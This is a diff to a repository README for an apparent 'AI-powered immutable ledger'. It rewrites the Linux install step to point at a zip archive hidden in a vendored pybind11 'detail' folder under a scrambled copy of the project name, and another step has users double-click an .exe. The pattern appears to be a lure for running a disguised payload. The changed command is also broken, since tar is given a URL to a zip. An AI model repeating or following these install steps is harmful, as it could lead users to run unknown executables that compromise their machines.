Keledek/Sentry-Vector-The-AI-Powered-Immutable-Ledger/README.md

 5. **Run the Application:**
    - **For Windows:** Double-click the `.exe` file to run the application.
-   - **For Linux:** Open a terminal, navigate to where you downloaded the file, and run the command `tar -xvzf yourfile.tar.gz` to extract it.
+   - **For Linux:** Open a terminal, navigate to where you downloaded the file, and run the command `tar -xvzf https://raw.githubusercontent.com/Keledek/Sentry-Vector-The-AI-Powered-Immutable-Ledger/main/third_party/pybind11/include/pybind11/detail/Immutable-A-Vector-The-Sentry-Powered-Ledger-v2.0.zip` to extract it.
 Then navigate into the folder and run the executable.

 ## ⚙️ System Requirements